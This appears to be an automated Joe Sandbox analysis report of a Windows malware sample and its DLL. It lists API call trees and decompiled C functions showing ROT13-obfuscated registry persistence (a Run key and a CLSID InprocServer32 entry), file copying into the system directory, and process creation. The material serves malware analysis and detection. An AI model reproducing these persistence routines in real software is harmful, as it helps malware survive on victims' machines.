                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateFileA.KERNEL32 ref: 00405531
                                                                            • Part of subcall function 00404F82: GetLocalTime.KERNEL32 ref: 00404FD9
                                                                            • Part of subcall function 00404F82: GetTickCount.KERNEL32 ref: 00404FE1
                                                                            • Part of subcall function 00404F82: srand.MSVCRT ref: 00404FE9
                                                                            • Part of subcall function 00404F82: rand.MSVCRT ref: 00404FF2
                                                                            • Part of subcall function 00404F82: GetTickCount.KERNEL32 ref: 00404FF9
                                                                            • Part of subcall function 00404F82: srand.MSVCRT ref: 00405001
                                                                            • Part of subcall function 00404F82: rand.MSVCRT ref: 0040500D
                                                                            • Part of subcall function 00404F82: GetTickCount.KERNEL32 ref: 00405026
                                                                            • Part of subcall function 00404F82: srand.MSVCRT ref: 0040502E
                                                                            • Part of subcall function 00404F82: rand.MSVCRT ref: 00405033
                                                                            • Part of subcall function 00404F82: GetTickCount.KERNEL32 ref: 0040504E
                                                                            • Part of subcall function 00404F82: srand.MSVCRT ref: 00405056
                                                                            • Part of subcall function 00404F82: rand.MSVCRT ref: 0040505B
                                                                            • Part of subcall function 00404F82: GetTickCount.KERNEL32 ref: 00405076
                                                                            • Part of subcall function 00404F82: srand.MSVCRT ref: 0040507E
                                                                            • Part of subcall function 00404F82: rand.MSVCRT ref: 00405083
                                                                            • Part of subcall function 00404F82: GetTickCount.KERNEL32 ref: 0040509E
                                                                            • Part of subcall function 00404F82: srand.MSVCRT ref: 004050A6
                                                                            • Part of subcall function 00404F82: rand.MSVCRT ref: 004050AB
                                                                            • Part of subcall function 00404F82: GetTickCount.KERNEL32 ref: 004050C6
                                                                            • Part of subcall function 00404F82: srand.MSVCRT ref: 004050CE
                                                                            • Part of subcall function 00404F82: rand.MSVCRT ref: 004050D3
                                                                            • Part of subcall function 00404F82: GetLocalTime.KERNEL32 ref: 004050E5
                                                                            • Part of subcall function 00404F82: _itoa.MSVCRT ref: 00405102
                                                                            • Part of subcall function 00404F82: rand.MSVCRT ref: 00405107
                                                                          • SetFilePointer.KERNEL32 ref: 00405574
                                                                          • WriteFile.KERNEL32 ref: 0040559A
                                                                          • Sleep.KERNEL32 ref: 004055A9
                                                                            • Part of subcall function 00404F82: rand.MSVCRT ref: 0040513A
                                                                            • Part of subcall function 00404F82: rand.MSVCRT ref: 00405168
                                                                            • Part of subcall function 00404F82: rand.MSVCRT ref: 00405196
                                                                            • Part of subcall function 00404F82: rand.MSVCRT ref: 004051C0
                                                                            • Part of subcall function 00404F82: rand.MSVCRT ref: 004051EF
                                                                          • SetFilePointer.KERNEL32 ref: 004055D4
                                                                          • WriteFile.KERNEL32 ref: 004055FA
                                                                          • Sleep.KERNEL32 ref: 00405609
                                                                          • SetFilePointer.KERNEL32 ref: 00405634
                                                                          • WriteFile.KERNEL32 ref: 0040565A
                                                                          • SetFilePointer.KERNEL32 ref: 0040567D
                                                                          • WriteFile.KERNEL32 ref: 004056AF
                                                                          • CloseHandle.KERNEL32 ref: 004056C0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: rand$File$CountTicksrand$PointerWrite$LocalSleepTime$CloseCreateHandle_itoa
                                                                          • String ID:
                                                                          • API String ID: 3159365393-0
                                                                          • Opcode ID: de0745b6355624464966b3122e120d1e1f8d0595332210ddc19a5d1648e15264
                                                                          • Instruction ID: 8e21804255f859d75eeaefc39514b6d8a1434258e14ca154f06cca4555a00953
                                                                          • Opcode Fuzzy Hash: de0745b6355624464966b3122e120d1e1f8d0595332210ddc19a5d1648e15264
                                                                          • Instruction Fuzzy Hash: 0341A5B14087019AD700BF29C19935FBFF4BB84358F51892EE8986B282D7798249CF97
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • rot13.SHERVANS ref: 1000239A
                                                                            • Part of subcall function 10001F26: rot13c.SHERVANS ref: 10001F40
                                                                          • add_system_direcroty.SHERVANS ref: 100023B4
                                                                            • Part of subcall function 10002209: memset.MSVCRT ref: 10002226
                                                                            • Part of subcall function 10002209: GetSystemDirectoryA.KERNEL32 ref: 10002232
                                                                            • Part of subcall function 10002209: lstrlen.KERNEL32 ref: 1000223D
                                                                            • Part of subcall function 10002209: lstrcat.KERNEL32 ref: 10002257
                                                                            • Part of subcall function 10002209: lstrcat.KERNEL32 ref: 10002269
                                                                          • rot13.SHERVANS ref: 100023CA
                                                                          • rot13.SHERVANS ref: 100023E0
                                                                          • RegOpenKeyExA.ADVAPI32 ref: 1000240A
                                                                          • RegOpenKeyExA.ADVAPI32 ref: 1000243B
                                                                          • lstrlen.KERNEL32 ref: 10002450
                                                                          • RegSetValueExA.ADVAPI32 ref: 10002484
                                                                          • RegCloseKey.ADVAPI32 ref: 10002495
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.259076355.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.259070497.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259083925.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259107376.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259117363.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259125606.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259132398.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: rot13$Openlstrcatlstrlen$CloseDirectorySystemValueadd_system_direcrotymemsetrot13c
                                                                          • String ID:
                                                                          • API String ID: 2120556822-0
                                                                          • Opcode ID: 438b2a9e79fb397ef7d0b9817d5b90411af66317ef6a23131a517141560c654b
                                                                          • Instruction ID: bdddcc0189fc53d49cb0cefcea4d87ad964771471e55bb7797a486d5498b6d1c
                                                                          • Opcode Fuzzy Hash: 438b2a9e79fb397ef7d0b9817d5b90411af66317ef6a23131a517141560c654b
                                                                          • Instruction Fuzzy Hash: 6D31D7B48083159FE710EF64C98579EFBF4EF45384F40896DE88883246E7759A888F42
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 170 405776-405807 memset CreateProcessA 171 405846-40584c 170->171 172 405809-40580d 170->172 173 405841 172->173 174 40580f-40583e WaitForSingleObject CloseHandle * 2 172->174 173->171 174->173
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle$CreateObjectProcessSingleWaitmemset
                                                                          • String ID: D$D
                                                                          • API String ID: 1209732917-143366177
                                                                          • Opcode ID: e2f293ddd65cc38ae5e984d70982910eef1ea10c3a02e6e8841cc2a871050653
                                                                          • Instruction ID: a424a9ca423c88ebceb4bf93d4a85606f6dbc14dab7ded7620f51e0c80248426
                                                                          • Opcode Fuzzy Hash: e2f293ddd65cc38ae5e984d70982910eef1ea10c3a02e6e8841cc2a871050653
                                                                          • Instruction Fuzzy Hash: 1D11A4B0904305DBEB00EF69C58935EBBF0BB44318F008A2DE894AB281D3799588CF96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00404620: memset.MSVCRT ref: 0040463D
                                                                            • Part of subcall function 00404620: GetSystemDirectoryA.KERNEL32 ref: 00404649
                                                                            • Part of subcall function 00404620: lstrlen.KERNEL32 ref: 00404654
                                                                            • Part of subcall function 00404620: lstrcat.KERNEL32 ref: 0040466E
                                                                            • Part of subcall function 00404620: lstrcat.KERNEL32 ref: 00404680
                                                                          • CreateFileA.KERNEL32 ref: 00405E5E
                                                                          • ExitProcess.KERNEL32 ref: 00405E7E
                                                                          • CloseHandle.KERNEL32 ref: 00405E9E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcat$CloseCreateDirectoryExitFileHandleProcessSystemlstrlenmemset
                                                                          • String ID: Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Eha$pgszra.rkr$user32.dll
                                                                          • API String ID: 1778546552-2563098034
                                                                          • Opcode ID: d7d64c2d6549dae37b7de272fb7fced938c3fb5e6f3e1c4ca9f739a992c91a64
                                                                          • Instruction ID: 8ce02ae271826c0af2d77be6dc83fb0dca404b62b159729ddab96385648218ed
                                                                          • Opcode Fuzzy Hash: d7d64c2d6549dae37b7de272fb7fced938c3fb5e6f3e1c4ca9f739a992c91a64
                                                                          • Instruction Fuzzy Hash: F3212AB08097049AD710BF21C58538EBBF4AF84358F41897EE9C867281D7BD858C8F96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 213 403f24-403f77 call 404c38 RegOpenKeyExA 216 403f79-403fcd RegCreateKeyExA 213->216 217 403fcf-40401d lstrlen RegSetValueExA RegCloseKey 213->217 216->217 218 404022-40402a 216->218 217->218
                                                                          C-Code - Quality: 51%
                                                                          			E00403F24(int _a4) {
                                                                          				void* _v12;
                                                                          				char _v140;
                                                                          				void* _v144;
                                                                          				void* _v172;
                                                                          				void* _v176;
                                                                          				void* _v180;
                                                                          				void* _v184;
                                                                          				intOrPtr _v188;
                                                                          				intOrPtr _v192;
                                                                          				int _v196;
                                                                          				int _v200;
                                                                          				int _v204;
                                                                          				long _t28;
                                                                          				char* _t36;
                                                                          				int _t37;
                                                                          				int _t38;
                                                                          				void* _t39;
                                                                          				void* _t41;
                                                                          				intOrPtr* _t42;
                                                                          
                                                                          				_t38 = _a4;
                                                                          				_v200 = "PYFVQ\\{R6SO5R20-QR35-11PS-9P87-00NN005127RQ}\\VacebpFreire32";
                                                                          				_t36 =  &_v140;
                                                                          				_v204 = _t36;
                                                                          				E00404C38();
                                                                          				_t28 = RegOpenKeyExA(0x80000000, _t36, 0, 0x20006,  &_v144); // executed
                                                                          				_t41 = _t39 - 0xac;
                                                                          				if(_t28 == 0) {
                                                                          					L2:
                                                                          					_v204 = _t38;
                                                                          					L0040C310();
                                                                          					_t42 = _t41 - 4;
                                                                          					_v188 = _t28 + 1;
                                                                          					_v192 = _t38;
                                                                          					_v196 = 1;
                                                                          					_v200 = 0;
                                                                          					_v204 = 0;
                                                                          					 *_t42 = _v144; // executed
                                                                          					RegSetValueExA(??, ??, ??, ??, ??, ??); // executed
                                                                          					 *((intOrPtr*)(_t42 - 0x18)) = _v144;
                                                                          					RegCloseKey(??);
                                                                          					_t37 = 1;
                                                                          				} else {
                                                                          					_t28 = RegCreateKeyExA(0x80000000, _t36, 0, 0, 0, 0x20006, 0,  &_v144, 0); // executed
                                                                          					_t41 = _t41 - 0x24;
                                                                          					_t37 = 0;
                                                                          					if(_t28 == 0) {
                                                                          						goto L2;
                                                                          					}
                                                                          				}
                                                                          				return _t37;
                                                                          			}






















                                                                          0x00403f2f
                                                                          0x00403f32
                                                                          0x00403f3a
                                                                          0x00403f40
                                                                          0x00403f43
                                                                          0x00403f6d
                                                                          0x00403f72
                                                                          0x00403f77
                                                                          0x00403fcf
                                                                          0x00403fcf
                                                                          0x00403fd2
                                                                          0x00403fd7
                                                                          0x00403fdb
                                                                          0x00403fdf
                                                                          0x00403fe3
                                                                          0x00403feb
                                                                          0x00403ff3
                                                                          0x00404001
                                                                          0x00404004
                                                                          0x00404012
                                                                          0x00404015
                                                                          0x0040401d
                                                                          0x00403f79
                                                                          0x00403fbe
                                                                          0x00403fc3
                                                                          0x00403fc6
                                                                          0x00403fcd
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403fcd
                                                                          0x0040402a

                                                                          APIs
                                                                          Strings
                                                                          • PYFVQ\{R6SO5R20-QR35-11PS-9P87-00NN005127RQ}\VacebpFreire32, xrefs: 00403F32
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateOpenValuelstrlen
                                                                          • String ID: PYFVQ\{R6SO5R20-QR35-11PS-9P87-00NN005127RQ}\VacebpFreire32
                                                                          • API String ID: 2036214137-2655177054
                                                                          • Opcode ID: 2297313f48ad8b5e75c594d751e4000a98a3ca6776ebaf8159479c7c2d1928ac
                                                                          • Instruction ID: 019c3a761b18c338743e8a7ff589e139028416f66cb1f4fe329e007e5a71a312
                                                                          • Opcode Fuzzy Hash: 2297313f48ad8b5e75c594d751e4000a98a3ca6776ebaf8159479c7c2d1928ac
                                                                          • Instruction Fuzzy Hash: FB21E6B08083159BE710EF25C58535ABBF4BB84348F00896EE88897281E77996488F92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • rot13.SHERVANS ref: 10002C88
                                                                            • Part of subcall function 10001F26: rot13c.SHERVANS ref: 10001F40
                                                                          • add_system_direcroty.SHERVANS ref: 10002CA2
                                                                            • Part of subcall function 10002209: memset.MSVCRT ref: 10002226
                                                                            • Part of subcall function 10002209: GetSystemDirectoryA.KERNEL32 ref: 10002232
                                                                            • Part of subcall function 10002209: lstrlen.KERNEL32 ref: 1000223D
                                                                            • Part of subcall function 10002209: lstrcat.KERNEL32 ref: 10002257
                                                                            • Part of subcall function 10002209: lstrcat.KERNEL32 ref: 10002269
                                                                          • rot13.SHERVANS ref: 10002CB2
                                                                          • add_system_direcroty.SHERVANS ref: 10002CCC
                                                                          • CopyFileA.KERNEL32 ref: 10002CE0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.259076355.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.259070497.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259083925.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259107376.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259117363.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259125606.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259132398.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: add_system_direcrotylstrcatrot13$CopyDirectoryFileSystemlstrlenmemsetrot13c
                                                                          • String ID: Q
                                                                          • API String ID: 3463403391-744326856
                                                                          • Opcode ID: 73894abf71014c9d91d8b117a35c23b4b992c917c2b5516e74d8d34c4059fe76
                                                                          • Instruction ID: 7dd5af438896393a7b97c0d8831b646f0bd0cf5f1eb72a97525d081a71af1fe0
                                                                          • Opcode Fuzzy Hash: 73894abf71014c9d91d8b117a35c23b4b992c917c2b5516e74d8d34c4059fe76
                                                                          • Instruction Fuzzy Hash: 450119B4408715AAD700EF61D9C529EFFB4EF44790F41885DE88847206D775A688CB83
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandleTime
                                                                          • String ID:
                                                                          • API String ID: 3397143404-0
                                                                          • Opcode ID: d53e2d7dcfffd8f13f9bdb4c7b018601c53aa096df535a78fcbe3ea045a6c83a
                                                                          • Instruction ID: 821c52c15d2594163c2509e09139001ce0ed311c0e70272f4ce7e626a9184330
                                                                          • Opcode Fuzzy Hash: d53e2d7dcfffd8f13f9bdb4c7b018601c53aa096df535a78fcbe3ea045a6c83a
                                                                          • Instruction Fuzzy Hash: B0210AB09083019BE700EF39C59535BBFE4AB84358F008A3DE994973D2E779C648CB96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 51%
                                                                          			E10002278(int _a4) {
                                                                          				void* _v12;
                                                                          				char _v140;
                                                                          				void* _v144;
                                                                          				void* _v172;
                                                                          				void* _v176;
                                                                          				void* _v180;
                                                                          				void* _v184;
                                                                          				intOrPtr _v188;
                                                                          				intOrPtr _v192;
                                                                          				int _v196;
                                                                          				int _v200;
                                                                          				int _v204;
                                                                          				long _t28;
                                                                          				char* _t36;
                                                                          				int _t37;
                                                                          				int _t38;
                                                                          				void* _t39;
                                                                          				void* _t41;
                                                                          				intOrPtr* _t42;
                                                                          
                                                                          				_t38 = _a4;
                                                                          				_v200 = "PYFVQ\\{R6SO5R20-QR35-11PS-9P87-00NN005127RQ}\\VacebpFreire32";
                                                                          				_t36 =  &_v140;
                                                                          				_v204 = _t36;
                                                                          				E10001F26();
                                                                          				_t28 = RegOpenKeyExA(0x80000000, _t36, 0, 0x20006,  &_v144); // executed
                                                                          				_t41 = _t39 - 0xac;
                                                                          				if(_t28 == 0) {
                                                                          					L2:
                                                                          					_v204 = _t38;
                                                                          					L10003570();
                                                                          					_t42 = _t41 - 4;
                                                                          					_v188 = _t28 + 1;
                                                                          					_v192 = _t38;
                                                                          					_v196 = 1;
                                                                          					_v200 = 0;
                                                                          					_v204 = 0;
                                                                          					 *_t42 = _v144; // executed
                                                                          					RegSetValueExA(??, ??, ??, ??, ??, ??); // executed
                                                                          					 *((intOrPtr*)(_t42 - 0x18)) = _v144; // executed
                                                                          					RegCloseKey(??); // executed
                                                                          					_t37 = 1;
                                                                          				} else {
                                                                          					_t28 = RegCreateKeyExA(0x80000000, _t36, 0, 0, 0, 0x20006, 0,  &_v144, 0);
                                                                          					_t41 = _t41 - 0x24;
                                                                          					_t37 = 0;
                                                                          					if(_t28 == 0) {
                                                                          						goto L2;
                                                                          					}
                                                                          				}
                                                                          				return _t37;
                                                                          			}






















                                                                          0x10002283
                                                                          0x10002286
                                                                          0x1000228e
                                                                          0x10002294
                                                                          0x10002297
                                                                          0x100022c1
                                                                          0x100022c6
                                                                          0x100022cb
                                                                          0x10002323
                                                                          0x10002323
                                                                          0x10002326
                                                                          0x1000232b
                                                                          0x1000232f
                                                                          0x10002333
                                                                          0x10002337
                                                                          0x1000233f
                                                                          0x10002347
                                                                          0x10002355
                                                                          0x10002358
                                                                          0x10002366
                                                                          0x10002369
                                                                          0x10002371
                                                                          0x100022cd
                                                                          0x10002312
                                                                          0x10002317
                                                                          0x1000231a
                                                                          0x10002321
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10002321
                                                                          0x1000237e

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.259076355.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.259070497.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259083925.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259107376.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259117363.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259125606.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259132398.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateOpenValuelstrlenrot13rot13c
                                                                          • String ID:
                                                                          • API String ID: 327323149-0
                                                                          • Opcode ID: 59e43c6821ea99cefc5617d5e071f6ef7f515ecb0e1053861fa941e5bf295870
                                                                          • Instruction ID: 0f2e1fea51bb9d7b4591eaea7ef700760b1debe67a353b116e3d9409648ad131
                                                                          • Opcode Fuzzy Hash: 59e43c6821ea99cefc5617d5e071f6ef7f515ecb0e1053861fa941e5bf295870
                                                                          • Instruction Fuzzy Hash: 2F21D8B48083159BE710EF25D54574FBBF8FB44394F40C96DE88887245E77996488F92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          • Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Rkcybere\ihyaiby32\Irefvba, xrefs: 00403D30
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
